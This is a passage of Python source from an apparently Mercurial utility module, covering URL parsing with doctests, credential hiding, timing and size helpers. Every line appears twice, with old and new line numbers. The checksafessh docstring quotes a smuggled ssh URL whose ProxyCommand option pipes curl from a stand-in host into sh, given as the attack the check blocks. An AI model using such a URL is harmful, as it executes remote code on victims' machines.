2984 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2983
2985
2984 Note that for backward compatibility reasons, bundle URLs do not
2986 Note that for backward compatibility reasons, bundle URLs do not
2985 take host names. That means 'bundle://../' has a path of '../'.
2987 take host names. That means 'bundle://../' has a path of '../'.
2986
2988
2987 Examples:
2989 Examples:
2988
2990
2989 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2991 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2990 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2992 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2991 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2993 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2992 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2994 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2993 >>> url(b'file:///home/joe/repo')
2995 >>> url(b'file:///home/joe/repo')
2994 <url scheme: 'file', path: '/home/joe/repo'>
2996 <url scheme: 'file', path: '/home/joe/repo'>
2995 >>> url(b'file:///c:/temp/foo/')
2997 >>> url(b'file:///c:/temp/foo/')
2996 <url scheme: 'file', path: 'c:/temp/foo/'>
2998 <url scheme: 'file', path: 'c:/temp/foo/'>
2997 >>> url(b'bundle:foo')
2999 >>> url(b'bundle:foo')
2998 <url scheme: 'bundle', path: 'foo'>
3000 <url scheme: 'bundle', path: 'foo'>
2999 >>> url(b'bundle://../foo')
3001 >>> url(b'bundle://../foo')
3000 <url scheme: 'bundle', path: '../foo'>
3002 <url scheme: 'bundle', path: '../foo'>
3001 >>> url(br'c:\foo\bar')
3003 >>> url(br'c:\foo\bar')
3002 <url path: 'c:\\foo\\bar'>
3004 <url path: 'c:\\foo\\bar'>
3003 >>> url(br'\\blah\blah\blah')
3005 >>> url(br'\\blah\blah\blah')
3004 <url path: '\\\\blah\\blah\\blah'>
3006 <url path: '\\\\blah\\blah\\blah'>
3005 >>> url(br'\\blah\blah\blah#baz')
3007 >>> url(br'\\blah\blah\blah#baz')
3006 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3008 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3007 >>> url(br'file:///C:\users\me')
3009 >>> url(br'file:///C:\users\me')
3008 <url scheme: 'file', path: 'C:\\users\\me'>
3010 <url scheme: 'file', path: 'C:\\users\\me'>
3009
3011
3010 Authentication credentials:
3012 Authentication credentials:
3011
3013
3012 >>> url(b'ssh://joe:xyz@x/repo')
3014 >>> url(b'ssh://joe:xyz@x/repo')
3013 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3015 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3014 >>> url(b'ssh://joe@x/repo')
3016 >>> url(b'ssh://joe@x/repo')
3015 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3017 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3016
3018
3017 Query strings and fragments:
3019 Query strings and fragments:
3018
3020
3019 >>> url(b'http://host/a?b#c')
3021 >>> url(b'http://host/a?b#c')
3020 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3022 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3021 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3023 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3022 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3024 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3023
3025
3024 Empty path:
3026 Empty path:
3025
3027
3026 >>> url(b'')
3028 >>> url(b'')
3027 <url path: ''>
3029 <url path: ''>
3028 >>> url(b'#a')
3030 >>> url(b'#a')
3029 <url path: '', fragment: 'a'>
3031 <url path: '', fragment: 'a'>
3030 >>> url(b'http://host/')
3032 >>> url(b'http://host/')
3031 <url scheme: 'http', host: 'host', path: ''>
3033 <url scheme: 'http', host: 'host', path: ''>
3032 >>> url(b'http://host/#a')
3034 >>> url(b'http://host/#a')
3033 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3035 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3034
3036
3035 Only scheme:
3037 Only scheme:
3036
3038
3037 >>> url(b'http:')
3039 >>> url(b'http:')
3038 <url scheme: 'http'>
3040 <url scheme: 'http'>
3039 """
3041 """
3040
3042
3041 _safechars = b"!~*'()+"
3043 _safechars = b"!~*'()+"
3042 _safepchars = b"/!~*'()+:\\"
3044 _safepchars = b"/!~*'()+:\\"
3043 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3045 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3044
3046
3045 def __init__(self, path, parsequery=True, parsefragment=True):
3047 def __init__(self, path, parsequery=True, parsefragment=True):
3046 # type: (bytes, bool, bool) -> None
3048 # type: (bytes, bool, bool) -> None
3047 # We slowly chomp away at path until we have only the path left
3049 # We slowly chomp away at path until we have only the path left
3048 self.scheme = self.user = self.passwd = self.host = None
3050 self.scheme = self.user = self.passwd = self.host = None
3049 self.port = self.path = self.query = self.fragment = None
3051 self.port = self.path = self.query = self.fragment = None
3050 self._localpath = True
3052 self._localpath = True
3051 self._hostport = b''
3053 self._hostport = b''
3052 self._origpath = path
3054 self._origpath = path
3053
3055
3054 if parsefragment and b'#' in path:
3056 if parsefragment and b'#' in path:
3055 path, self.fragment = path.split(b'#', 1)
3057 path, self.fragment = path.split(b'#', 1)
3056
3058
3057 # special case for Windows drive letters and UNC paths
3059 # special case for Windows drive letters and UNC paths
3058 if hasdriveletter(path) or path.startswith(b'\\\\'):
3060 if hasdriveletter(path) or path.startswith(b'\\\\'):
3059 self.path = path
3061 self.path = path
3060 return
3062 return
3061
3063
3062 # For compatibility reasons, we can't handle bundle paths as
3064 # For compatibility reasons, we can't handle bundle paths as
3063 # normal URLS
3065 # normal URLS
3064 if path.startswith(b'bundle:'):
3066 if path.startswith(b'bundle:'):
3065 self.scheme = b'bundle'
3067 self.scheme = b'bundle'
3066 path = path[7:]
3068 path = path[7:]
3067 if path.startswith(b'//'):
3069 if path.startswith(b'//'):
3068 path = path[2:]
3070 path = path[2:]
3069 self.path = path
3071 self.path = path
3070 return
3072 return
3071
3073
3072 if self._matchscheme(path):
3074 if self._matchscheme(path):
3073 parts = path.split(b':', 1)
3075 parts = path.split(b':', 1)
3074 if parts[0]:
3076 if parts[0]:
3075 self.scheme, path = parts
3077 self.scheme, path = parts
3076 self._localpath = False
3078 self._localpath = False
3077
3079
3078 if not path:
3080 if not path:
3079 path = None
3081 path = None
3080 if self._localpath:
3082 if self._localpath:
3081 self.path = b''
3083 self.path = b''
3082 return
3084 return
3083 else:
3085 else:
3084 if self._localpath:
3086 if self._localpath:
3085 self.path = path
3087 self.path = path
3086 return
3088 return
3087
3089
3088 if parsequery and b'?' in path:
3090 if parsequery and b'?' in path:
3089 path, self.query = path.split(b'?', 1)
3091 path, self.query = path.split(b'?', 1)
3090 if not path:
3092 if not path:
3091 path = None
3093 path = None
3092 if not self.query:
3094 if not self.query:
3093 self.query = None
3095 self.query = None
3094
3096
3095 # // is required to specify a host/authority
3097 # // is required to specify a host/authority
3096 if path and path.startswith(b'//'):
3098 if path and path.startswith(b'//'):
3097 parts = path[2:].split(b'/', 1)
3099 parts = path[2:].split(b'/', 1)
3098 if len(parts) > 1:
3100 if len(parts) > 1:
3099 self.host, path = parts
3101 self.host, path = parts
3100 else:
3102 else:
3101 self.host = parts[0]
3103 self.host = parts[0]
3102 path = None
3104 path = None
3103 if not self.host:
3105 if not self.host:
3104 self.host = None
3106 self.host = None
3105 # path of file:///d is /d
3107 # path of file:///d is /d
3106 # path of file:///d:/ is d:/, not /d:/
3108 # path of file:///d:/ is d:/, not /d:/
3107 if path and not hasdriveletter(path):
3109 if path and not hasdriveletter(path):
3108 path = b'/' + path
3110 path = b'/' + path
3109
3111
3110 if self.host and b'@' in self.host:
3112 if self.host and b'@' in self.host:
3111 self.user, self.host = self.host.rsplit(b'@', 1)
3113 self.user, self.host = self.host.rsplit(b'@', 1)
3112 if b':' in self.user:
3114 if b':' in self.user:
3113 self.user, self.passwd = self.user.split(b':', 1)
3115 self.user, self.passwd = self.user.split(b':', 1)
3114 if not self.host:
3116 if not self.host:
3115 self.host = None
3117 self.host = None
3116
3118
3117 # Don't split on colons in IPv6 addresses without ports
3119 # Don't split on colons in IPv6 addresses without ports
3118 if (
3120 if (
3119 self.host
3121 self.host
3120 and b':' in self.host
3122 and b':' in self.host
3121 and not (
3123 and not (
3122 self.host.startswith(b'[') and self.host.endswith(b']')
3124 self.host.startswith(b'[') and self.host.endswith(b']')
3123 )
3125 )
3124 ):
3126 ):
3125 self._hostport = self.host
3127 self._hostport = self.host
3126 self.host, self.port = self.host.rsplit(b':', 1)
3128 self.host, self.port = self.host.rsplit(b':', 1)
3127 if not self.host:
3129 if not self.host:
3128 self.host = None
3130 self.host = None
3129
3131
3130 if (
3132 if (
3131 self.host
3133 self.host
3132 and self.scheme == b'file'
3134 and self.scheme == b'file'
3133 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3135 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3134 ):
3136 ):
3135 raise error.Abort(
3137 raise error.Abort(
3136 _(b'file:// URLs can only refer to localhost')
3138 _(b'file:// URLs can only refer to localhost')
3137 )
3139 )
3138
3140
3139 self.path = path
3141 self.path = path
3140
3142
3141 # leave the query string escaped
3143 # leave the query string escaped
3142 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3144 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3143 v = getattr(self, a)
3145 v = getattr(self, a)
3144 if v is not None:
3146 if v is not None:
3145 setattr(self, a, urlreq.unquote(v))
3147 setattr(self, a, urlreq.unquote(v))
3146
3148
3147 def copy(self):
3149 def copy(self):
3148 u = url(b'temporary useless value')
3150 u = url(b'temporary useless value')
3149 u.path = self.path
3151 u.path = self.path
3150 u.scheme = self.scheme
3152 u.scheme = self.scheme
3151 u.user = self.user
3153 u.user = self.user
3152 u.passwd = self.passwd
3154 u.passwd = self.passwd
3153 u.host = self.host
3155 u.host = self.host
3154 u.path = self.path
3156 u.path = self.path
3155 u.query = self.query
3157 u.query = self.query
3156 u.fragment = self.fragment
3158 u.fragment = self.fragment
3157 u._localpath = self._localpath
3159 u._localpath = self._localpath
3158 u._hostport = self._hostport
3160 u._hostport = self._hostport
3159 u._origpath = self._origpath
3161 u._origpath = self._origpath
3160 return u
3162 return u
3161
3163
3162 @encoding.strmethod
3164 @encoding.strmethod
3163 def __repr__(self):
3165 def __repr__(self):
3164 attrs = []
3166 attrs = []
3165 for a in (
3167 for a in (
3166 b'scheme',
3168 b'scheme',
3167 b'user',
3169 b'user',
3168 b'passwd',
3170 b'passwd',
3169 b'host',
3171 b'host',
3170 b'port',
3172 b'port',
3171 b'path',
3173 b'path',
3172 b'query',
3174 b'query',
3173 b'fragment',
3175 b'fragment',
3174 ):
3176 ):
3175 v = getattr(self, a)
3177 v = getattr(self, a)
3176 if v is not None:
3178 if v is not None:
3177 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3179 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3178 return b'<url %s>' % b', '.join(attrs)
3180 return b'<url %s>' % b', '.join(attrs)
3179
3181
3180 def __bytes__(self):
3182 def __bytes__(self):
3181 r"""Join the URL's components back into a URL string.
3183 r"""Join the URL's components back into a URL string.
3182
3184
3183 Examples:
3185 Examples:
3184
3186
3185 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3187 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3186 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3188 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3187 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3189 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3188 'http://user:pw@host:80/?foo=bar&baz=42'
3190 'http://user:pw@host:80/?foo=bar&baz=42'
3189 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3191 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3190 'http://user:pw@host:80/?foo=bar%3dbaz'
3192 'http://user:pw@host:80/?foo=bar%3dbaz'
3191 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3193 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3192 'ssh://user:pw@[::1]:2200//home/joe#'
3194 'ssh://user:pw@[::1]:2200//home/joe#'
3193 >>> bytes(url(b'http://localhost:80//'))
3195 >>> bytes(url(b'http://localhost:80//'))
3194 'http://localhost:80//'
3196 'http://localhost:80//'
3195 >>> bytes(url(b'http://localhost:80/'))
3197 >>> bytes(url(b'http://localhost:80/'))
3196 'http://localhost:80/'
3198 'http://localhost:80/'
3197 >>> bytes(url(b'http://localhost:80'))
3199 >>> bytes(url(b'http://localhost:80'))
3198 'http://localhost:80/'
3200 'http://localhost:80/'
3199 >>> bytes(url(b'bundle:foo'))
3201 >>> bytes(url(b'bundle:foo'))
3200 'bundle:foo'
3202 'bundle:foo'
3201 >>> bytes(url(b'bundle://../foo'))
3203 >>> bytes(url(b'bundle://../foo'))
3202 'bundle:../foo'
3204 'bundle:../foo'
3203 >>> bytes(url(b'path'))
3205 >>> bytes(url(b'path'))
3204 'path'
3206 'path'
3205 >>> bytes(url(b'file:///tmp/foo/bar'))
3207 >>> bytes(url(b'file:///tmp/foo/bar'))
3206 'file:///tmp/foo/bar'
3208 'file:///tmp/foo/bar'
3207 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3209 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3208 'file:///c:/tmp/foo/bar'
3210 'file:///c:/tmp/foo/bar'
3209 >>> print(url(br'bundle:foo\bar'))
3211 >>> print(url(br'bundle:foo\bar'))
3210 bundle:foo\bar
3212 bundle:foo\bar
3211 >>> print(url(br'file:///D:\data\hg'))
3213 >>> print(url(br'file:///D:\data\hg'))
3212 file:///D:\data\hg
3214 file:///D:\data\hg
3213 """
3215 """
3214 if self._localpath:
3216 if self._localpath:
3215 s = self.path
3217 s = self.path
3216 if self.scheme == b'bundle':
3218 if self.scheme == b'bundle':
3217 s = b'bundle:' + s
3219 s = b'bundle:' + s
3218 if self.fragment:
3220 if self.fragment:
3219 s += b'#' + self.fragment
3221 s += b'#' + self.fragment
3220 return s
3222 return s
3221
3223
3222 s = self.scheme + b':'
3224 s = self.scheme + b':'
3223 if self.user or self.passwd or self.host:
3225 if self.user or self.passwd or self.host:
3224 s += b'//'
3226 s += b'//'
3225 elif self.scheme and (
3227 elif self.scheme and (
3226 not self.path
3228 not self.path
3227 or self.path.startswith(b'/')
3229 or self.path.startswith(b'/')
3228 or hasdriveletter(self.path)
3230 or hasdriveletter(self.path)
3229 ):
3231 ):
3230 s += b'//'
3232 s += b'//'
3231 if hasdriveletter(self.path):
3233 if hasdriveletter(self.path):
3232 s += b'/'
3234 s += b'/'
3233 if self.user:
3235 if self.user:
3234 s += urlreq.quote(self.user, safe=self._safechars)
3236 s += urlreq.quote(self.user, safe=self._safechars)
3235 if self.passwd:
3237 if self.passwd:
3236 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3238 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3237 if self.user or self.passwd:
3239 if self.user or self.passwd:
3238 s += b'@'
3240 s += b'@'
3239 if self.host:
3241 if self.host:
3240 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3242 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3241 s += urlreq.quote(self.host)
3243 s += urlreq.quote(self.host)
3242 else:
3244 else:
3243 s += self.host
3245 s += self.host
3244 if self.port:
3246 if self.port:
3245 s += b':' + urlreq.quote(self.port)
3247 s += b':' + urlreq.quote(self.port)
3246 if self.host:
3248 if self.host:
3247 s += b'/'
3249 s += b'/'
3248 if self.path:
3250 if self.path:
3249 # TODO: similar to the query string, we should not unescape the
3251 # TODO: similar to the query string, we should not unescape the
3250 # path when we store it, the path might contain '%2f' = '/',
3252 # path when we store it, the path might contain '%2f' = '/',
3251 # which we should *not* escape.
3253 # which we should *not* escape.
3252 s += urlreq.quote(self.path, safe=self._safepchars)
3254 s += urlreq.quote(self.path, safe=self._safepchars)
3253 if self.query:
3255 if self.query:
3254 # we store the query in escaped form.
3256 # we store the query in escaped form.
3255 s += b'?' + self.query
3257 s += b'?' + self.query
3256 if self.fragment is not None:
3258 if self.fragment is not None:
3257 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3259 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3258 return s
3260 return s
3259
3261
3260 __str__ = encoding.strmethod(__bytes__)
3262 __str__ = encoding.strmethod(__bytes__)
3261
3263
3262 def authinfo(self):
3264 def authinfo(self):
3263 user, passwd = self.user, self.passwd
3265 user, passwd = self.user, self.passwd
3264 try:
3266 try:
3265 self.user, self.passwd = None, None
3267 self.user, self.passwd = None, None
3266 s = bytes(self)
3268 s = bytes(self)
3267 finally:
3269 finally:
3268 self.user, self.passwd = user, passwd
3270 self.user, self.passwd = user, passwd
3269 if not self.user:
3271 if not self.user:
3270 return (s, None)
3272 return (s, None)
3271 # authinfo[1] is passed to urllib2 password manager, and its
3273 # authinfo[1] is passed to urllib2 password manager, and its
3272 # URIs must not contain credentials. The host is passed in the
3274 # URIs must not contain credentials. The host is passed in the
3273 # URIs list because Python < 2.4.3 uses only that to search for
3275 # URIs list because Python < 2.4.3 uses only that to search for
3274 # a password.
3276 # a password.
3275 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3277 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3276
3278
3277 def isabs(self):
3279 def isabs(self):
3278 if self.scheme and self.scheme != b'file':
3280 if self.scheme and self.scheme != b'file':
3279 return True # remote URL
3281 return True # remote URL
3280 if hasdriveletter(self.path):
3282 if hasdriveletter(self.path):
3281 return True # absolute for our purposes - can't be joined()
3283 return True # absolute for our purposes - can't be joined()
3282 if self.path.startswith(br'\\'):
3284 if self.path.startswith(br'\\'):
3283 return True # Windows UNC path
3285 return True # Windows UNC path
3284 if self.path.startswith(b'/'):
3286 if self.path.startswith(b'/'):
3285 return True # POSIX-style
3287 return True # POSIX-style
3286 return False
3288 return False
3287
3289
3288 def localpath(self):
3290 def localpath(self):
3289 # type: () -> bytes
3291 # type: () -> bytes
3290 if self.scheme == b'file' or self.scheme == b'bundle':
3292 if self.scheme == b'file' or self.scheme == b'bundle':
3291 path = self.path or b'/'
3293 path = self.path or b'/'
3292 # For Windows, we need to promote hosts containing drive
3294 # For Windows, we need to promote hosts containing drive
3293 # letters to paths with drive letters.
3295 # letters to paths with drive letters.
3294 if hasdriveletter(self._hostport):
3296 if hasdriveletter(self._hostport):
3295 path = self._hostport + b'/' + self.path
3297 path = self._hostport + b'/' + self.path
3296 elif (
3298 elif (
3297 self.host is not None and self.path and not hasdriveletter(path)
3299 self.host is not None and self.path and not hasdriveletter(path)
3298 ):
3300 ):
3299 path = b'/' + path
3301 path = b'/' + path
3300 return path
3302 return path
3301 return self._origpath
3303 return self._origpath
3302
3304
3303 def islocal(self):
3305 def islocal(self):
3304 '''whether localpath will return something that posixfile can open'''
3306 '''whether localpath will return something that posixfile can open'''
3305 return (
3307 return (
3306 not self.scheme
3308 not self.scheme
3307 or self.scheme == b'file'
3309 or self.scheme == b'file'
3308 or self.scheme == b'bundle'
3310 or self.scheme == b'bundle'
3309 )
3311 )
3310
3312
3311
3313
3312 def hasscheme(path):
3314 def hasscheme(path):
3313 # type: (bytes) -> bool
3315 # type: (bytes) -> bool
3314 return bool(url(path).scheme) # cast to help pytype
3316 return bool(url(path).scheme) # cast to help pytype
3315
3317
3316
3318
3317 def hasdriveletter(path):
3319 def hasdriveletter(path):
3318 # type: (bytes) -> bool
3320 # type: (bytes) -> bool
3319 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
3321 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
3320
3322
3321
3323
3322 def urllocalpath(path):
3324 def urllocalpath(path):
3323 # type: (bytes) -> bytes
3325 # type: (bytes) -> bytes
3324 return url(path, parsequery=False, parsefragment=False).localpath()
3326 return url(path, parsequery=False, parsefragment=False).localpath()
3325
3327
3326
3328
3327 def checksafessh(path):
3329 def checksafessh(path):
3328 # type: (bytes) -> None
3330 # type: (bytes) -> None
3329 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3331 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3330
3332
3331 This is a sanity check for ssh urls. ssh will parse the first item as
3333 This is a sanity check for ssh urls. ssh will parse the first item as
3332 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3334 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3333 Let's prevent these potentially exploited urls entirely and warn the
3335 Let's prevent these potentially exploited urls entirely and warn the
3334 user.
3336 user.
3335
3337
3336 Raises an error.Abort when the url is unsafe.
3338 Raises an error.Abort when the url is unsafe.
3337 """
3339 """
3338 path = urlreq.unquote(path)
3340 path = urlreq.unquote(path)
3339 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3341 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3340 raise error.Abort(
3342 raise error.Abort(
3341 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3343 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3342 )
3344 )
3343
3345
3344
3346
3345 def hidepassword(u):
3347 def hidepassword(u):
3346 # type: (bytes) -> bytes
3348 # type: (bytes) -> bytes
3347 '''hide user credential in a url string'''
3349 '''hide user credential in a url string'''
3348 u = url(u)
3350 u = url(u)
3349 if u.passwd:
3351 if u.passwd:
3350 u.passwd = b'***'
3352 u.passwd = b'***'
3351 return bytes(u)
3353 return bytes(u)
3352
3354
3353
3355
3354 def removeauth(u):
3356 def removeauth(u):
3355 # type: (bytes) -> bytes
3357 # type: (bytes) -> bytes
3356 '''remove all authentication information from a url string'''
3358 '''remove all authentication information from a url string'''
3357 u = url(u)
3359 u = url(u)
3358 u.user = u.passwd = None
3360 u.user = u.passwd = None
3359 return bytes(u)
3361 return bytes(u)
3360
3362
3361
3363
3362 timecount = unitcountfn(
3364 timecount = unitcountfn(
3363 (1, 1e3, _(b'%.0f s')),
3365 (1, 1e3, _(b'%.0f s')),
3364 (100, 1, _(b'%.1f s')),
3366 (100, 1, _(b'%.1f s')),
3365 (10, 1, _(b'%.2f s')),
3367 (10, 1, _(b'%.2f s')),
3366 (1, 1, _(b'%.3f s')),
3368 (1, 1, _(b'%.3f s')),
3367 (100, 0.001, _(b'%.1f ms')),
3369 (100, 0.001, _(b'%.1f ms')),
3368 (10, 0.001, _(b'%.2f ms')),
3370 (10, 0.001, _(b'%.2f ms')),
3369 (1, 0.001, _(b'%.3f ms')),
3371 (1, 0.001, _(b'%.3f ms')),
3370 (100, 0.000001, _(b'%.1f us')),
3372 (100, 0.000001, _(b'%.1f us')),
3371 (10, 0.000001, _(b'%.2f us')),
3373 (10, 0.000001, _(b'%.2f us')),
3372 (1, 0.000001, _(b'%.3f us')),
3374 (1, 0.000001, _(b'%.3f us')),
3373 (100, 0.000000001, _(b'%.1f ns')),
3375 (100, 0.000000001, _(b'%.1f ns')),
3374 (10, 0.000000001, _(b'%.2f ns')),
3376 (10, 0.000000001, _(b'%.2f ns')),
3375 (1, 0.000000001, _(b'%.3f ns')),
3377 (1, 0.000000001, _(b'%.3f ns')),
3376 )
3378 )
3377
3379
3378
3380
3379 @attr.s
3381 @attr.s
3380 class timedcmstats(object):
3382 class timedcmstats(object):
3381 """Stats information produced by the timedcm context manager on entering."""
3383 """Stats information produced by the timedcm context manager on entering."""
3382
3384
3383 # the starting value of the timer as a float (meaning and resulution is
3385 # the starting value of the timer as a float (meaning and resulution is
3384 # platform dependent, see util.timer)
3386 # platform dependent, see util.timer)
3385 start = attr.ib(default=attr.Factory(lambda: timer()))
3387 start = attr.ib(default=attr.Factory(lambda: timer()))
3386 # the number of seconds as a floating point value; starts at 0, updated when
3388 # the number of seconds as a floating point value; starts at 0, updated when
3387 # the context is exited.
3389 # the context is exited.
3388 elapsed = attr.ib(default=0)
3390 elapsed = attr.ib(default=0)
3389 # the number of nested timedcm context managers.
3391 # the number of nested timedcm context managers.
3390 level = attr.ib(default=1)
3392 level = attr.ib(default=1)
3391
3393
3392 def __bytes__(self):
3394 def __bytes__(self):
3393 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3395 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3394
3396
3395 __str__ = encoding.strmethod(__bytes__)
3397 __str__ = encoding.strmethod(__bytes__)
3396
3398
3397
3399
3398 @contextlib.contextmanager
3400 @contextlib.contextmanager
3399 def timedcm(whencefmt, *whenceargs):
3401 def timedcm(whencefmt, *whenceargs):
3400 """A context manager that produces timing information for a given context.
3402 """A context manager that produces timing information for a given context.
3401
3403
3402 On entering a timedcmstats instance is produced.
3404 On entering a timedcmstats instance is produced.
3403
3405
3404 This context manager is reentrant.
3406 This context manager is reentrant.
3405
3407
3406 """
3408 """
3407 # track nested context managers
3409 # track nested context managers
3408 timedcm._nested += 1
3410 timedcm._nested += 1
3409 timing_stats = timedcmstats(level=timedcm._nested)
3411 timing_stats = timedcmstats(level=timedcm._nested)
3410 try:
3412 try:
3411 with tracing.log(whencefmt, *whenceargs):
3413 with tracing.log(whencefmt, *whenceargs):
3412 yield timing_stats
3414 yield timing_stats
3413 finally:
3415 finally:
3414 timing_stats.elapsed = timer() - timing_stats.start
3416 timing_stats.elapsed = timer() - timing_stats.start
3415 timedcm._nested -= 1
3417 timedcm._nested -= 1
3416
3418
3417
3419
3418 timedcm._nested = 0
3420 timedcm._nested = 0
3419
3421
3420
3422
3421 def timed(func):
3423 def timed(func):
3422 """Report the execution time of a function call to stderr.
3424 """Report the execution time of a function call to stderr.
3423
3425
3424 During development, use as a decorator when you need to measure
3426 During development, use as a decorator when you need to measure
3425 the cost of a function, e.g. as follows:
3427 the cost of a function, e.g. as follows:
3426
3428
3427 @util.timed
3429 @util.timed
3428 def foo(a, b, c):
3430 def foo(a, b, c):
3429 pass
3431 pass
3430 """
3432 """
3431
3433
3432 def wrapper(*args, **kwargs):
3434 def wrapper(*args, **kwargs):
3433 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3435 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3434 result = func(*args, **kwargs)
3436 result = func(*args, **kwargs)
3435 stderr = procutil.stderr
3437 stderr = procutil.stderr
3436 stderr.write(
3438 stderr.write(
3437 b'%s%s: %s\n'
3439 b'%s%s: %s\n'
3438 % (
3440 % (
3439 b' ' * time_stats.level * 2,
3441 b' ' * time_stats.level * 2,
3440 pycompat.bytestr(func.__name__),
3442 pycompat.bytestr(func.__name__),
3441 time_stats,
3443 time_stats,
3442 )
3444 )
3443 )
3445 )
3444 return result
3446 return result
3445
3447
3446 return wrapper
3448 return wrapper
3447
3449
3448
3450
3449 _sizeunits = (
3451 _sizeunits = (
3450 (b'm', 2 ** 20),
3452 (b'm', 2 ** 20),
3451 (b'k', 2 ** 10),
3453 (b'k', 2 ** 10),
3452 (b'g', 2 ** 30),
3454 (b'g', 2 ** 30),
3453 (b'kb', 2 ** 10),
3455 (b'kb', 2 ** 10),
3454 (b'mb', 2 ** 20),
3456 (b'mb', 2 ** 20),
3455 (b'gb', 2 ** 30),
3457 (b'gb', 2 ** 30),
3456 (b'b', 1),
3458 (b'b', 1),
3457 )
3459 )
3458
3460
3459
3461
3460 def sizetoint(s):
3462 def sizetoint(s):
3461 # type: (bytes) -> int
3463 # type: (bytes) -> int
3462 """Convert a space specifier to a byte count.
3464 """Convert a space specifier to a byte count.
3463
3465
3464 >>> sizetoint(b'30')
3466 >>> sizetoint(b'30')
3465 30
3467 30
3466 >>> sizetoint(b'2.2kb')
3468 >>> sizetoint(b'2.2kb')
3467 2252
3469 2252
3468 >>> sizetoint(b'6M')
3470 >>> sizetoint(b'6M')
3469 6291456
3471 6291456
3470 """
3472 """
3471 t = s.strip().lower()
3473 t = s.strip().lower()
3472 try:
3474 try:
3473 for k, u in _sizeunits:
3475 for k, u in _sizeunits:
3474 if t.endswith(k):
3476 if t.endswith(k):
3475 return int(float(t[: -len(k)]) * u)
3477 return int(float(t[: -len(k)]) * u)
3476 return int(t)
3478 return int(t)
3477 except ValueError:
3479 except ValueError:
3478 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3480 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3479
3481
3480
3482
3481 class hooks(object):
3483 class hooks(object):
3482 """A collection of hook functions that can be used to extend a
3484 """A collection of hook functions that can be used to extend a
3483 function's behavior. Hooks are called in lexicographic order,
3485 function's behavior. Hooks are called in lexicographic order,
3484 based on the names of their sources."""
3486 based on the names of their sources."""
3485
3487
3486 def __init__(self):
3488 def __init__(self):
3487 self._hooks = []
3489 self._hooks = []
3488
3490
3489 def add(self, source, hook):
3491 def add(self, source, hook):
3490 self._hooks.append((source, hook))
3492 self._hooks.append((source, hook))
3491
3493
3492 def __call__(self, *args):
3494 def __call__(self, *args):
3493 self._hooks.sort(key=lambda x: x[0])
3495 self._hooks.sort(key=lambda x: x[0])
3494 results = []
3496 results = []
3495 for source, hook in self._hooks:
3497 for source, hook in self._hooks:
3496 results.append(hook(*args))
